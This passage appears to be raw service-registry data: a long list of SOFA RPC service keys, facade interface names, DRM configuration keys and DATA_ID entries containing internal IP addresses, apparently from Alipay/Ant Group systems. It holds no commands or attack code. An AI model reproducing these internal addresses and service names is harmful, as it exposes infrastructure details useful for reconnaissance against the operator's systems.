INSTANCE_ID#@#SOFA.DRM","com.alibaba.dataphin.publishing.common.facade.submit.PrePublishSpi:1.0:data-process@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.paramcore.common.service.manage.facade.api.enumtemplate.ParmEnumConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbsalescenter.common.service.facade.redeem.AssetRedeemOrderQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.argo.spi.publish.CustomDeployFacade:1.0:PCREDITKIT_RULE_CONFIG@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.SDKTest:name=com.alipay.dwebupload.client.drm.DomainConfig.aftsUpVIP,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insserviceprod.facade.InsSerMaintainFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:new-compmng-compensation-auditBatchCallBack-accept@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insclaimportal.common.service.InsClaimScriptFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:morderprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.kwlib:name=com.alipay.common.tracer.manage.TracerDrm.zdalOtsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opscloudcore.framework.core.facade.OpscloudClientSyncServiceFacade:1.0:apires@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.abilitycore.common.service.facade.solution.callback.SceneApplyCallback:1.0:isvSpiCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.71.89#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.etetestcore:name=com.alipay.kmi.client.cache.refresher.keyName,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.dk.common.service.facade.open.api.verify.StreamingDataVerifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.credible.UserCredibleMobileWriteService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dpc.dasbi.common.service.facade.api.DatasetImportFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openeval.common.service.facade.activityha.ActivityhaServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mergepayprod.common.service.facade.mergeorder.api.MergeOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileanti.common.service.mvcfacade.service.CustomsCrowdService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeexprod:name=com.alipay.common.webx.session.drm.SessionLogDrm.isPrintDetails,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.omocore.common.knowledge.api.ScriptRecommendResultQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openmonitor.common.service.facade.IGroovyScriptService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.airbops.mobileDataSource.switcher,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchiscore.settling.common.service.facade.SettlingViewQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:agdsroalipay@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.kbasset.common.service.facade.material.MaterialQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ck:name=com.alipay.zdal.config.groupCluster.riskmng_riskmngSlaveDataSource_gc.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cscheck.service.facade.api.QcServiceTrackFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mctlib.biz.manager.service.MctTaskStatusOperateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:zcachev3case@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.custrelation.service.facade.entity.EntityRelationQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.biz.service.loan.impl.support.drm.LpLoanApplyConfigDrm.deductRepayNotRetryErrCodes,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.52.184.136#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.cifin.cifinDataSource.validator,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finscenemng.common.service.facade.api.PhaseMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.discount.common.service.facade.management.CampBudgetQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.peerpay.prod.biz.account.api.IRemoteJointAccountGZService:1.0:iRemoteJointAccountGZService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.intimateprod.common.service.facade.api.IntimateBenefitFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.cif.client.drm.CifTouchCacheSwitcher.touchRate,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilesecurity.common.service.api.password.PasswordFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zdataquery.common.service.facade.BizOrderQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloudpay.openapi.device.DeviceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:pcrulecentercommon@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocenter.facade.api.ActivityBudgetManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openinsight.common.openplatform.facade.authority.api.AuthorityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.drm.insmobiledrmhandler.createBannerJson,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zcbsalescenter.biz.cashing.service.CashingProductOffSaleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promoguard.common.service.facade.capacity.api.FlowLabelManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.100.100#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.insbffweb:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.guardianConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.paydecision.service.api.PayChannelQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.158.67#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.mwalletmng:name=com.alipay.mwalletmng.biz.luckymoney.drm.LuckMoneyDRMResource.globalSyncOperators,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.afwrobottwa:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.globalTimeout,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.45.68.205#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finfundprod.common.service.facade.FundAssetHoldingFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.172.63#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:shopForbiddenWordsValidator@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:sffgroup-region@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcomment.common.service.facade.link.LinkConfigUpdateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dwalm.facade.api.FmRuleQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchishub.common.service.facade.api.BusinessVerifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.discount.common.service.facade.management.CampRelateSubjectService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imerchprod.ipaysales.facade.api.contract.IpaysalesContractCommonFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instpay.facade.api.WithdrawAuditService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundtrade.common.service.facade.api.FundDividendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.omocore.common.service.facade.ServiceOrderSearchEngineFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcommerceprod.common.service.facade.CategoryQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cifin:name=com.alipay.cif.model.cache.CifCOControlSwitch.shadowReadCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:archimedes_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.darwin:name=com.alipay.darwin.sdk.config.oss.endpoint,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.salesmng.common.service.facade.merchant.api.CrmMerchantRelationService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.xviewcore:name=com.alipay.xview.core.AdjustSubjectAggregateView.cacheExpireTime,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zpaas:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.slaLogParamSet,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alibaba.dataphin.nightswatch.common.facade.TenantApi:1.0:dpnightswatch@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.baoxiancore.common.service.InsPolicyQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.chaos.dig.facade.zerodivisor.ZeroDivisorMetaFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.paymentmng:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.vmEmergencyDoubleCheck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.amct.facade.ATestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alideviceinfo.rpc.DeviceLocationFacade:1.0:mobileacauth@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.antschedulerconsole.endpoint.facade.IJobGroupRestFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.airbops:name=com.alipay.cif.model.cache.CifCOControlSwitch.l2WriteCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.girisk.common.service.facade.api.model.WhiteListFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.194.133#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zskynet:name=com.alipay.common.tracer.manage.TracerDrm.zdalTairDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.assetflux.service.assettool.spi.AssetToolDebitService:1.0:discount-debit@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.servicegovern.common.service.facade.AuthRuleFacade:1.0:offline@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.linepay.common.serivce.facade.recon.ReconResultAdjustService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agdsmmg.common.service.facade.axel.AlpsServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.defincustomer.facade.api.verifycode.VerifycodeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gotone.common.service.api.MailSendRecordService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.mif.common.service.facade.mng.MerchantCacheRefreshFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.102.210.132#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:peerpay@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dwalm.core.service.fluidmng.rule.engine.RuleEngine:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.opinioncore:name=com.alipay.opinioncore.common.drm.YqAlarmLevelDrm.newsMediaLevelMax,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","HEALTHY_V2@kbasecore#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:cflesserpanda@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mobilecodec.core.service.xcache.XCacheProviderClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openitemcore.common.service.facade.api.management.grayctrl.GrayCtrlRuleQueryFacade:1.0:APPXCORE@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.custprod.service.api.AlipayLoginPreValidateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.partner.PartnerOperationQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promobench.common.service.facade.service.RuleCreateServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.common.dal.drm.scene.FinSceneRuleCenterDrmImpl.sasHistoryNewConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.83.25.68#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.158.43.184#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.insclaiminvestprod.facade.claim.invest.InvestTaskApplyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appstore.common.service.facade.commodity.BumngCommodityTaskInfoFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.core.config.cache.service.MftransAllAccountLogQueryTableSwitchCache:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.schedulerweb.service.facade.operate.TaskRouteFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.159.87#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.166.215.173#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:dpnightswatch@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:financeAuditTimeoutHandle@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.amberdata.metadata.service.MetadataCodeService:1.0:metadataCodeService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.workflow.common.service.facade.api.tsd.TsdEmpowerInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.170.255#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Sub_Servers_TP_VENDORCORE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.cscheck.service.facade.api.GeneralQcResultFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.findecision.common.service.facade.notify.NotifyServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityexprod.biz.lisa.service.alipayauth.LisaProductManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfmng:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.jdbcUrlCheckDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mdistinguish.common.service.facade.RedPicTemplateServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cicada.common.service.facade.api.dynamicview.ValidationRuleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acauthcore.common.service.facade.manager.ActionRamInfoManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.75.183#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.rpartner.service.facade.RigelTaskQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_O_BKRDFAST_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.morderprod:name=com.alipay.morderprod.switch.solutionResubmitWhites,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.mybank.bksupplychainprod.common.service.facade.ticket.api.ScpTicketTradeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.shared.activity.drm.SceneActivityDrm.starWishWhiteActivityConf,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.routeclient.interfacename:lowercaseFirst#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.alipaymember.common.service.facade.config.service.CrowdService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mindv.okcourse.service.UserInfoQueryServiceClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:hybridinspect#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","cn.com.antcloud.acmeteragecore.common.service.manager.MeterDomainQueryManager#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.kbasecore.service.libview.facade.LibViewQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.transfercenter.common.service.freeamount.api.TransferFreeAmountFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alphaq.common.facade.label.api.ITaskDatasetFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.prodcore.service.api.salesplan.SalesPlanInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pmc.common.service.facade.callback.WebXCallBackApplication:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.common.service.facade.chat.LifeChatReplyRecordFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.channelrouter.service.facade.ChannelBatchQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dt.dataphin.openapi.WorkflowService:1.0:dpide@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iprocess.sip.action.Action:1.0:webSiteCheckAction@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.graymng.common.service.facade.api.GrayWhiteAccountFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alifi.agds.master.client.api.ModelInfoManager:1.0:bkModelInfoManagerService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcshield.common.service.facade.preeval.service.GenericInvokeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finannafccore.common.service.facade.scenario.api.yeb.YebEmergencyFundFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundprod.common.service.facade.api.PaymentBankAuthService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialcore.facade.market.SocialContactFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.buc.acl.api.service.DataAccessControlService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeapcore:name=com.alipay.common.tracer.manage.TracerDrm.enableRpc2JvmDigest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:icrowd@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.decisionx.facade.api.DxReleaseService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.fporgassetkeeper.facade.api.CommonFacade:1.0:fporgassetkeeper@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.antcloud.dds.zdal.interfaces.endpoint.facade.rest.openapi.RestOpenApiAppDsFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.promocenter:name=com.alipay.promocenter.common.drm.PromocenterBussinessParamsDrmResource.payRedirectUrlBase,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.fininfo:name=com.alipay.antvip.client.internal.drm.DrmControl.mainSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.contentfusion.myhome.service.facade.AppDataFacade:1.0:mrchportalcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.custcpt.facade.UserMobileRelationQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imobileprod.common.service.api.facade.feed.FeedCardOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.shop.ShopOrderQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csconfig.service.mng.facade.api.OperateLogQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcloanbenefit.common.service.facade.benefit.BenefitIssueFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finorm.core.service.guardian.CleanHistoryDataCoreService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_INSTOPEN#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfinvest.facade.api.during.InvestTRFManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.workpoint.WorkPointFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.giftprod.common.service.facade.honeyrelation.IntimatePayFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.bluearmyprod:name=com.alipay.antvip.client.internal.drm.DrmControl.restrainStrategy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_TP_C_INSASSET_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.fininfo:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.ioErrorIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.mybank.bkibdeposit.common.service.facade.query.InstCertificateQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.charge.common.dal.conf.impl.ChargeNewDRMConfigureImpl.uploadBillQuerySize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.taskcenter.common.service.facade.callback.ProcessCallback:1.0.0:globalprod_cer@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.receipt.api.PayReceiptService:1.0:30@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcomment.common.service.facade.backmanagement.TairManagementQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:nirvana_9527_80102053@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insofflineinvest.common.service.facade.service.InvestAppointQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fporgassetcenter.common.service.facade.api.query.ast.AssetRiskQueryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inslifeprod.common.facade.stats.InsLifeStatsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilesecurity.common.service.api.device.DeviceFacade:1.0:mobilesecurity@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.starwish.drm.impl.StarWishDrmImpl.maxStarWishNum,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.acticketmng.common.service.facade.api.manage.ApiManualManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:tbapi#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finbatch.comm.service.facade.accept.FinBatchService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.46.146#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:UcdpmngInfosecTaskCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.30.210.151#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.antfeaturelib.common.facade.service.BizSystemService:1.0:publicDomain_finannafccore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:oaProcessAgreeCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:mobileops_mobileopsProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.116.198#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.ipay.iaccenter.facade.query.api.AccInfoQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiscore.common.service.facade.operation.OperationDistrictQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.74.14#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.instrtdecision.common.service.facade.api.SettleChannelQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fininflux.common.service.facade.outflux.OutfluxRiskCtrlService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.15.247.162#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.edeductcenter.common.service.facade.DeductBizActionCallBack:1.0:ebppprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@govdataprod#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","Alipay.certifymng:name=com.alipay.cif.drm.PasswordRevokeSwitch.gesturePasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.141.218#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fincommontaskhub.service.facade.service.api.TaskQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cscheck.service.facade.api.RuleCheckTenantFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.128.73#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.opscloudcore.common.service.facade.execute.callback.ChangeServiceExecutionCallback:1.0:cloudbox@DEFAU